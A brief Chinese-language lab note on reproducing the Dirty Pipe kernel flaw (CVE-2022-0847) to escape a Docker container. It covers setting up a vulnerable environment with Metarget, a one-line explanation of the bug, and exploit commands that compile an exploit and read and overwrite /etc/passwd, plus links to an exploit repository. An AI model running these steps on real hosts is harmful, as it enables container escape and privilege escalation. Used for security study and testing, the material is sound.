安裝環境

./metarget cnv install cve-2022-0847 --verbose

原理

同臟牛，通過寫只讀內存，對映射的內存做篡改

EXP

docker run --rm -it -v $(pwd):/exp --cap-add=CAP_DAC_READ_SEARCH ubuntu如果提示 Unknown capability to add: "CAP_CAP_DAC_READ_SEARCH"錯誤則運行下列命令docker run --rm -it -v $(pwd):/exp --cap-add=DAC_READ_SEARCH ubuntugcc dp.c -o dp讀系統文件：/exp/dp /etc/passwd寫系統文件 /exp/dp /etc/passwd 1 ootz:

GitHub - greenhandatsjtu/CVE-2022-0847-Container-Escape: CVE-2022-0847 used to achieve container escape 利用CVE-2022-0847 (Dirty Pipe) 實現容器逃逸

參考

云原生之容器安全實踐-安全客 - 安全資訊平臺 (anquanke.com)

從臟管道(CVE-2022-0847)到docker逃逸 - 先知社區 (aliyun.com)